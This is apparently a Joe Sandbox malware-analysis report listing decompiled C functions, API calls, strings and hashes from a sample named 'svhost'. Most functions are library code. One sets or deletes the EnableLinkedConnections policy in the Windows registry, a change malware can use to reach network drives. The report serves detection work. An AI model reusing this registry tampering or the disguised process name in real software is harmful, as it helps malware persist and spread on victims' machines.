                                      • Opcode ID: f17c19aa269b4614edfc13f4c26996c7a71b6d13f58e78cc271297b4f3c1a569
                                      • Instruction ID: eb8a374d66f7dc9f78514c0dd9b3d53235420b40eb54e0d6a562956c6add631a
                                      • Opcode Fuzzy Hash: f17c19aa269b4614edfc13f4c26996c7a71b6d13f58e78cc271297b4f3c1a569
                                      • Instruction Fuzzy Hash: 01316071914148DBCB08EB91ECA2EEEB7B9EF54310F407529F85676191EF30AA49CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E55820 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 56registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E55820(signed char _a4) {
				signed int _v8;
				char _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				signed int _t16;
				void* _t28;
				void* _t35;
				void* _t36;
				signed int _t37;

				_t16 =  *0xeef074; // 0x221cac15
				_v8 = _t16 ^ _t37;
				if((_a4 & 0x000000ff) == 0) {
					_t34 =  &_v20;
					_v28 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0xf003f,  &_v20);
					if(_v28 == 0) {
						RegDeleteValueW(_v20, L"EnableLinkedConnections");
						RegCloseKey(_v20);
					}
				} else {
					_v24 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0xf003f,  &_v16);
					if(_v24 == 0) {
						_v12 = 1;
						_t34 =  &_v12;
						RegSetValueExW(_v16, L"EnableLinkedConnections", 0, 4,  &_v12, 4);
						RegCloseKey(_v16);
					}
				}
				return E00E89A35(_t28, _v8 ^ _t37, _t34, _t35, _t36);
			}














                                      0x00e55826
                                      0x00e5582d
                                      0x00e55836
                                      0x00e55888
                                      0x00e558a3
                                      0x00e558aa
                                      0x00e558b5
                                      0x00e558bf
                                      0x00e558bf
                                      0x00e55838
                                      0x00e55853
                                      0x00e5585a
                                      0x00e5585c
                                      0x00e55865
                                      0x00e55876
                                      0x00e55880
                                      0x00e55880
                                      0x00e55886
                                      0x00e558d2

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,000F003F,?), ref: 00E5584D
                                      • RegSetValueExW.ADVAPI32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 00E55876
                                      • RegCloseKey.ADVAPI32(?), ref: 00E55880
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,000F003F,?), ref: 00E5589D
                                      • RegDeleteValueW.ADVAPI32(?,EnableLinkedConnections), ref: 00E558B5
                                      • RegCloseKey.ADVAPI32(?), ref: 00E558BF
                                      Strings
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00E55843
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00E55893
                                      • EnableLinkedConnections, xrefs: 00E558AC
                                      • EnableLinkedConnections, xrefs: 00E5586D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenValue$Delete
                                      • String ID: EnableLinkedConnections$EnableLinkedConnections$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                      • API String ID: 4171954881-224122817
                                      • Opcode ID: 7254b83442d9f14a8703cd99f14797b1970f4d658f42ce688bdf5c1facf954e7
                                      • Instruction ID: 7819f7495871e33c842dcff37f352e9a2f2e20d195c4431cd9a9103bbdb88b33
                                      • Opcode Fuzzy Hash: 7254b83442d9f14a8703cd99f14797b1970f4d658f42ce688bdf5c1facf954e7
                                      • Instruction Fuzzy Hash: 84115BB1A80308EFDB18DBA0DC5AFBDB774EB58701F105868BB157A2C1DA705609DB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E60F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E00E60F30(void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				void* __ecx;
				void* __ebp;
				signed int _t24;
				intOrPtr _t38;
				signed int _t55;

				_push(0xffffffff);
				_push(0xec03ca);
				_push( *[fs:0x0]);
				_push(_t38);
				_t24 =  *0xeef074; // 0x221cac15
				_push(_t24 ^ _t55);
				 *[fs:0x0] =  &_v16;
				_v20 = _t38;
				E00E724FC(_v20, 0);
				_v8 = 0;
				E00E56800(_v20 + 4);
				_v8 = 1;
				E00E56800(_v20 + 0xc);
				_v8 = 2;
				E00E56720(_v20 + 0x14);
				_v8 = 3;
				E00E56720(_v20 + 0x1c);
				_v8 = 4;
				E00E56800(_v20 + 0x24);
				_v8 = 5;
				E00E56800(_v20 + 0x2c);
				_v8 = 6;
				if(_a4 == 0) {
					E00E72801("bad locale name");
				}
				E00E76752(_v20, _v20, _a4);
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v20;
			}











                                      0x00e60f33
                                      0x00e60f35
                                      0x00e60f40
                                      0x00e60f41
                                      0x00e60f42
                                      0x00e60f49
                                      0x00e60f4d
                                      0x00e60f53
                                      0x00e60f5b
                                      0x00e60f60
                                      0x00e60f6d
                                      0x00e60f72
                                      0x00e60f7c
                                      0x00e60f81
                                      0x00e60f8b
                                      0x00e60f90
                                      0x00e60f9a
                                      0x00e60f9f
                                      0x00e60fa9
                                      0x00e60fae
                                      0x00e60fb8
                                      0x00e60fbd
                                      0x00e60fc5
                                      0x00e60fcc
                                      0x00e60fcc
                                      0x00e60fd9
                                      0x00e60fe1
                                      0x00e60fee
                                      0x00e60ff9

                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E60F5B
                                      • _Yarn.LIBCPMTD ref: 00E60F6D
                                      • _Yarn.LIBCPMTD ref: 00E60F7C
                                      • _Yarn.LIBCPMTD ref: 00E60F8B
                                      • _Yarn.LIBCPMTD ref: 00E60F9A
                                      • _Yarn.LIBCPMTD ref: 00E60FA9
                                      • _Yarn.LIBCPMTD ref: 00E60FB8
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E60FD9
                                        • Part of subcall function 00E72801: std::bad_exception::bad_exception.LIBCMTD ref: 00E7280D
                                        • Part of subcall function 00E72801: __CxxThrowException@8.LIBVCRUNTIME ref: 00E7281B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarn$std::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                      • String ID: bad locale name
                                      • API String ID: 3305330502-1405518554
                                      • Opcode ID: 11372e79c5c51ec00986e83ec28ccdeceb730f34f49694cceaf53694d28f95d0
                                      • Instruction ID: bded882427d50012ddf4eda847b84cc1a995105239b1cc48661c73e64be52d04
                                      • Opcode Fuzzy Hash: 11372e79c5c51ec00986e83ec28ccdeceb730f34f49694cceaf53694d28f95d0
                                      • Instruction Fuzzy Hash: 0A216AB1D04289EBDF08DB98C851BAEBBB4FF04318F04595DE8227B382CB755A04C761
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5EC10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 89%
                                      			E00E5EC10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, char _a4, char _a8) {
				intOrPtr _v0;
				char _v8;
				char _v16;
				signed char _v17;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v88;
				char _v104;
				signed int _t64;
				void* _t73;
				signed char* _t76;
				signed int _t104;
				signed int _t126;
				void* _t127;
				void* _t134;

				_t134 = __eflags;
				_push(0xffffffff);
				_push(0xec0c3a);
				_push( *[fs:0x0]);
				_t64 =  *0xeef074; // 0x221cac15
				_push(_t64 ^ _t126);
				_t1 =  &_v16; // 0xe5e520
				 *[fs:0x0] = _t1;
				_v28 = __ecx;
				_v24 = 0;
				E00E56E70(_v28);
				_v8 = 0;
				E00E524A0( &_a4);
				_t130 = _t127 - 0x58 + 4 - 0xc;
				_v68 = _t127 - 0x58 + 4 - 0xc;
				_t8 =  &_a8; // 0xe5e520
				_v72 = E00E53ED0( *_t8, _t130);
				_v8 = 1;
				_t12 =  &_a8; // 0xe5e520
				_v36 = E00E53E90( *_t12,  &_v44);
				_v40 = _v36;
				_v8 = 2;
				_t73 = E00E53120(_v40);
				_v8 = 3;
				E00E56D20(__ebx, _v28, __edi, __esi, _t134, _t73,  &_a4);
				_v8 = 0;
				E00E530E0();
				_t22 =  &_a8; // 0xe5e520
				_t76 = E00E53F20( *_t22);
				_t135 =  *_t76 & 0x000000ff;
				if(( *_t76 & 0x000000ff) == 0) {
					_v56 = E00E536F0(__ebx, __edi, __esi, __eflags,  &_v88, _v0);
					_v60 = _v56;
					_v8 = 5;
					_t104 = _v24 | 0x00000002;
					__eflags = _t104;
					_v24 = _t104;
					_v32 = _v60;
				} else {
					_t23 =  &_a8; // 0xe5e520
					_v48 = E00E53CC0( &_v104, E00E53F20( *_t23) + 4);
					_v52 = _v48;
					_v8 = 4;
					_v24 = _v24 | 0x00000001;
					_v32 = _v52;
				}
				_v64 = _v32;
				E00E56CF0(_v28, _t135, _v64);
				_v8 = 4;
				if((_v24 & 0x00000002) != 0) {
					_v24 = _v24 & 0xfffffffd;
					E00E53750( &_v88);
				}
				_v8 = 0;
				if((_v24 & 0x00000001) != 0) {
					_v24 = _v24 & 0xfffffffe;
					E00E53750( &_v104);
				}
				_push(_v17 & 0x000000ff);
				E00E5F2B0(_v28,  &_a4);
				_v8 = 0xffffffff;
				_t62 =  &_v16; // 0xe5e520
				 *[fs:0x0] =  *_t62;
				return _v28;
			}





























                                      0x00e5ec10
                                      0x00e5ec13
                                      0x00e5ec15
                                      0x00e5ec20
                                      0x00e5ec24
                                      0x00e5ec2b
                                      0x00e5ec2c
                                      0x00e5ec2f
                                      0x00e5ec35
                                      0x00e5ec38
                                      0x00e5ec42
                                      0x00e5ec47
                                      0x00e5ec52
                                      0x00e5ec5a
                                      0x00e5ec5f
                                      0x00e5ec63
                                      0x00e5ec6b
                                      0x00e5ec6e
                                      0x00e5ec76
                                      0x00e5ec7e
                                      0x00e5ec84
                                      0x00e5ec87
                                      0x00e5ec8e
                                      0x00e5ec97
                                      0x00e5ec9b
                                      0x00e5eca0
                                      0x00e5eca7
                                      0x00e5ecac
                                      0x00e5ecb0
                                      0x00e5ecbb
                                      0x00e5ecbd
                                      0x00e5ed05
                                      0x00e5ed0b
                                      0x00e5ed0e
                                      0x00e5ed18
                                      0x00e5ed18
                                      0x00e5ed1b
                                      0x00e5ed21
                                      0x00e5ecbf
                                      0x00e5ecbf
                                      0x00e5ecd7
                                      0x00e5ecdd
                                      0x00e5ece0
                                      0x00e5ecea
                                      0x00e5ecf0
                                      0x00e5ecf0
                                      0x00e5ed27
                                      0x00e5ed31
                                      0x00e5ed36
                                      0x00e5ed43
                                      0x00e5ed45
                                      0x00e5ed4c
                                      0x00e5ed4c
                                      0x00e5ed51
                                      0x00e5ed5e
                                      0x00e5ed60
                                      0x00e5ed67
                                      0x00e5ed67
                                      0x00e5ed70
                                      0x00e5ed78
                                      0x00e5ed7d
                                      0x00e5ed87
                                      0x00e5ed8a
                                      0x00e5ed95

                                      APIs
                                      • Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00E5EC66
                                        • Part of subcall function 00E53ED0: Concurrency::scheduler_ptr::scheduler_ptr.LIBCPMTD ref: 00E53EE7
                                      • Concurrency::task_options::get_cancellation_token.LIBCPMTD ref: 00E5EC79
                                        • Part of subcall function 00E53E90: Concurrency::cancellation_token_source::cancellation_token_source.LIBCPMTD ref: 00E53EAA
                                      • Concurrency::cancellation_token::_GetImplValue.LIBCPMTD ref: 00E5EC8E
                                        • Part of subcall function 00E56D20: Concurrency::scheduler_ptr::scheduler_ptr.LIBCPMTD ref: 00E56D5B
                                        • Part of subcall function 00E56D20: _Task_ptr.LIBCPMTD ref: 00E56D68
                                        • Part of subcall function 00E56D20: shared_ptr.LIBCMTD ref: 00E56D80
                                        • Part of subcall function 00E56D20: std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E56D88
                                        • Part of subcall function 00E56D20: shared_ptr.LIBCPMTD ref: 00E56DA3
                                      • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 00E5ECA7
                                        • Part of subcall function 00E530E0: Concurrency::cancellation_token::_Clear.LIBCPMTD ref: 00E53109
                                      • Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack.LIBCPMTD ref: 00E5ECD2
                                      • task.LIBCPMTD ref: 00E5ED31
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancellation_token::_Concurrency::scheduler_ptr::scheduler_ptrContainer_base12Container_base12::~_CreationTaskshared_ptrstd::_$CallstackCallstack::_ClearConcurrency::cancellation_token_source::cancellation_token_sourceConcurrency::details::_Concurrency::task_options::get_cancellation_tokenConcurrency::task_options::get_schedulerImplTask_ptrValuetask
                                      • String ID: $
                                      • API String ID: 894463372-1111102306
                                      • Opcode ID: 153b4f34b7fa2d7abf5da02c3bca8534093e844323ee03702c75e88464bee5d1
                                      • Instruction ID: 7067c3853599e4fb2285afa7690cc4f406ae894dc30159cccd0b9c9b099c315c
                                      • Opcode Fuzzy Hash: 153b4f34b7fa2d7abf5da02c3bca8534093e844323ee03702c75e88464bee5d1
                                      • Instruction Fuzzy Hash: E9512DB5D01248EFCB04DFA8D952AEEBBF5AF48311F108519E915B7381DB345B08CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E55180 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00E55180(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				void* __ecx;
				void* __ebp;
				signed int _t25;
				void* _t39;
				intOrPtr _t40;
				void* _t58;
				signed int _t59;

				_t58 = __edi;
				_t39 = __ebx;
				_push(0xffffffff);
				_push(0xec03ca);
				_push( *[fs:0x0]);
				_push(_t40);
				_t25 =  *0xeef074; // 0x221cac15
				_push(_t25 ^ _t59);
				 *[fs:0x0] =  &_v16;
				_v20 = _t40;
				E00E724FC(_v20, 0);
				_v8 = 0;
				E00E56800(_v20 + 4);
				_v8 = 1;
				E00E56800(_v20 + 0xc);
				_v8 = 2;
				E00E56720(_v20 + 0x14);
				_v8 = 3;
				E00E56720(_v20 + 0x1c);
				_v8 = 4;
				E00E56800(_v20 + 0x24);
				_v8 = 5;
				E00E56800(_v20 + 0x2c);
				_v8 = 6;
				if(_a8 == 0) {
					E00E72801("bad locale name");
				}
				E00E74D1F(_t39, _a4, _t58, _v20, _a4, _a8);
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v20;
			}













                                      0x00e55180
                                      0x00e55180
                                      0x00e55183
                                      0x00e55185
                                      0x00e55190
                                      0x00e55191
                                      0x00e55192
                                      0x00e55199
                                      0x00e5519d
                                      0x00e551a3
                                      0x00e551ab
                                      0x00e551b0
                                      0x00e551bd
                                      0x00e551c2
                                      0x00e551cc
                                      0x00e551d1
                                      0x00e551db
                                      0x00e551e0
                                      0x00e551ea
                                      0x00e551ef
                                      0x00e551f9
                                      0x00e551fe
                                      0x00e55208
                                      0x00e5520d
                                      0x00e55215
                                      0x00e5521c
                                      0x00e5521c
                                      0x00e5522d
                                      0x00e55235
                                      0x00e55242
                                      0x00e5524d

                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00E551AB
                                      • _Yarn.LIBCPMTD ref: 00E551BD
                                      • _Yarn.LIBCPMTD ref: 00E551CC
                                      • _Yarn.LIBCPMTD ref: 00E551DB
                                      • _Yarn.LIBCPMTD ref: 00E551EA
                                      • _Yarn.LIBCPMTD ref: 00E551F9
                                      • _Yarn.LIBCPMTD ref: 00E55208
                                        • Part of subcall function 00E72801: std::bad_exception::bad_exception.LIBCMTD ref: 00E7280D
                                        • Part of subcall function 00E72801: __CxxThrowException@8.LIBVCRUNTIME ref: 00E7281B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarn$Exception@8LockitLockit::_Throwstd::_std::bad_exception::bad_exception
                                      • String ID: bad locale name
                                      • API String ID: 438106372-1405518554
                                      • Opcode ID: 796647690f47032d13b93deeb8b78e9ed28bc51c1e54427bb90d177f1c69e8a1
                                      • Instruction ID: 72d3605adb15c48f1db003436c921f700d5766baa51f9e309512036466cf5437
                                      • Opcode Fuzzy Hash: 796647690f47032d13b93deeb8b78e9ed28bc51c1e54427bb90d177f1c69e8a1
                                      • Instruction Fuzzy Hash: A7218EB1D04148EBDF08DB98C851BAEBBB4FF44318F04995CE9227B382CB755A04CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E8AC80 Relevance: 13.7, APIs: 9, Instructions: 156memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 47%
                                      			E00E8AC80(void* __ebx, char* __edx, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				int _v36;
				short* _v40;
				int _v44;
				intOrPtr _v56;
				void* _v60;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				char _t33;
				int _t34;
				signed short _t36;
				signed short _t38;
				void* _t49;
				short* _t50;
				int _t51;
				int _t53;
				char* _t59;
				int _t60;
				void* _t61;
				char* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t70;
				intOrPtr _t71;
				int _t72;
				intOrPtr* _t73;
				void* _t75;
				short* _t76;
				void* _t79;
				signed int _t80;
				void* _t82;
				short* _t83;

				_t70 = __edx;
				_push(0xfffffffe);
				_push(0xeec1f0);
				_push( &M00EA0B20);
				_push( *[fs:0x0]);
				_t83 = _t82 - 0x18;
				_t30 =  *0xeef074; // 0x221cac15
				_v12 = _v12 ^ _t30;
				_t31 = _t30 ^ _t80;
				_v32 = _t31;
				_push(__ebx);
				_push(_t76);
				_push(_t72);
				_push(_t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t83;
				_t59 = _a4;
				if(_t59 != 0) {
					_t62 = _t59;
					_t10 =  &(_t62[1]); // 0xed268c
					_t70 = _t10;
					do {
						_t33 =  *_t62;
						_t62 =  &(_t62[1]);
					} while (_t33 != 0);
					_t63 = _t62 - _t70;
					_t11 = _t63 + 1; // 0xed268d
					_t34 = _t11;
					_v36 = _t34;
					if(_t34 > 0x7fffffff) {
						L17:
						E00E8AC60(0x80070057);
						goto L18;
					} else {
						asm("lfence");
						_t72 = MultiByteToWideChar(0, 0, _t59, _t34, 0, 0);
						_v44 = _t72;
						if(_t72 == 0) {
							L18:
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							E00E8AC60(_t36);
							goto L21;
						} else {
							_v8 = 0;
							_t49 = _t72 + _t72;
							if(_t72 >= 0x1000) {
								asm("lfence");
								_push(_t49);
								_t50 = E00EA49B4();
								_t83 =  &(_t83[2]);
								_t76 = _t50;
								_v40 = _t76;
								_v8 = 0xfffffffe;
							} else {
								E00E8A400();
								_v28 = _t83;
								_t76 = _t83;
								_v40 = _t76;
								_v8 = 0xfffffffe;
							}
							_t51 = _v36;
							if(_t76 == 0) {
								L16:
								E00E8AC60(0x8007000e);
								goto L17;
							} else {
								asm("lfence");
								_t53 = MultiByteToWideChar(0, 0, _t59, _t51, _t76, _t72);
								if(_t53 == 0) {
									L21:
									if(_t72 >= 0x1000) {
										asm("lfence");
										E00EA478C(_t76);
										_t83 =  &(_t83[2]);
									}
									_t38 = GetLastError();
									if(_t38 > 0) {
										_t38 = _t38 & 0x0000ffff | 0x80070000;
									}
									E00E8AC60(_t38);
									asm("int3");
									asm("int3");
									_push(_t80);
									_t71 = _v56;
									_push(_t72);
									_t73 = _t63;
									 *_t73 = 0xec8288;
									 *((intOrPtr*)(_t73 + 4)) =  *((intOrPtr*)(_t71 + 4));
									_t64 =  *((intOrPtr*)(_t71 + 8));
									 *((intOrPtr*)(_t73 + 8)) = _t64;
									 *(_t73 + 0xc) = 0;
									if(_t64 != 0) {
										 *0xec4320(_t64, _t76);
										 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 4))))();
									}
									return _t73;
								} else {
									asm("lfence");
									__imp__#2(_t76);
									_t60 = _t53;
									if(_t72 >= 0x1000) {
										asm("lfence");
										E00EA478C(_t76);
										_t83 =  &(_t83[2]);
									}
									if(_t60 == 0) {
										goto L16;
									} else {
										asm("lfence");
										goto L2;
									}
								}
							}
						}
					}
				} else {
					L2:
					 *[fs:0x0] = _v20;
					_pop(_t75);
					_pop(_t79);
					_pop(_t61);
					return E00E89A35(_t61, _v32 ^ _t80, _t70, _t75, _t79);
				}
			}









































                                      0x00e8ac80
                                      0x00e8ac83
                                      0x00e8ac85
                                      0x00e8ac8a
                                      0x00e8ac95
                                      0x00e8ac96
                                      0x00e8ac99
                                      0x00e8ac9e
                                      0x00e8aca1
                                      0x00e8aca3
                                      0x00e8aca6
                                      0x00e8aca7
                                      0x00e8aca8
                                      0x00e8aca9
                                      0x00e8acad
                                      0x00e8acb3
                                      0x00e8acb6
                                      0x00e8acbb
                                      0x00e8ace0
                                      0x00e8ace2
                                      0x00e8ace2
                                      0x00e8ace5
                                      0x00e8ace5
                                      0x00e8ace7
                                      0x00e8ace8
                                      0x00e8acec
                                      0x00e8acee
                                      0x00e8acee
                                      0x00e8acf1
                                      0x00e8acf9
                                      0x00e8add0
                                      0x00e8add5
                                      0x00000000
                                      0x00e8acff
                                      0x00e8acff
                                      0x00e8ad12
                                      0x00e8ad14
                                      0x00e8ad19
                                      0x00e8adda
                                      0x00e8adda
                                      0x00e8ade2
                                      0x00e8ade7
                                      0x00e8ade7
                                      0x00e8aded
                                      0x00000000
                                      0x00e8ad1f
                                      0x00e8ad1f
                                      0x00e8ad26
                                      0x00e8ad2f
                                      0x00e8ad47
                                      0x00e8ad4a
                                      0x00e8ad4b
                                      0x00e8ad50
                                      0x00e8ad53
                                      0x00e8ad55
                                      0x00e8ad58
                                      0x00e8ad31
                                      0x00e8ad31
                                      0x00e8ad36
                                      0x00e8ad39
                                      0x00e8ad3b
                                      0x00e8ad3e
                                      0x00e8ad3e
                                      0x00e8ad7c
                                      0x00e8ad81
                                      0x00e8adc6
                                      0x00e8adcb
                                      0x00000000
                                      0x00e8ad83
                                      0x00e8ad83
                                      0x00e8ad8e
                                      0x00e8ad96
                                      0x00e8adf2
                                      0x00e8adf8
                                      0x00e8adfa
                                      0x00e8adfe
                                      0x00e8ae03
                                      0x00e8ae03
                                      0x00e8ae06
                                      0x00e8ae0e
                                      0x00e8ae13
                                      0x00e8ae13
                                      0x00e8ae19
                                      0x00e8ae1e
                                      0x00e8ae1f
                                      0x00e8ae20
                                      0x00e8ae23
                                      0x00e8ae26
                                      0x00e8ae27
                                      0x00e8ae29
                                      0x00e8ae32
                                      0x00e8ae35
                                      0x00e8ae38
                                      0x00e8ae3b
                                      0x00e8ae44
                                      0x00e8ae4f
                                      0x00e8ae55
                                      0x00e8ae57
                                      0x00e8ae5c
                                      0x00e8ad98
                                      0x00e8ad98
                                      0x00e8ad9c
                                      0x00e8ada2
                                      0x00e8adaa
                                      0x00e8adac
                                      0x00e8adb0
                                      0x00e8adb5
                                      0x00e8adb5
                                      0x00e8adba
                                      0x00000000
                                      0x00e8adbc
                                      0x00e8adbc
                                      0x00000000
                                      0x00e8adbf
                                      0x00e8adba
                                      0x00e8ad96
                                      0x00e8ad81
                                      0x00e8ad19
                                      0x00e8acbd
                                      0x00e8acbf
                                      0x00e8acc5
                                      0x00e8accd
                                      0x00e8acce
                                      0x00e8accf
                                      0x00e8acdd
                                      0x00e8acdd

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00ED268B,00ED268D,00000000,00000000,221CAC15,?,?,?,00ED268B,00000000,?,00E6F338,00ED268B,0000000C), ref: 00E8AD0C
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00ED268B,?,00000000,00000000,?,00ED268B,00000000,?,00E6F338,00ED268B), ref: 00E8AD8E
                                      • SysAllocString.OLEAUT32(00000000), ref: 00E8AD9C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
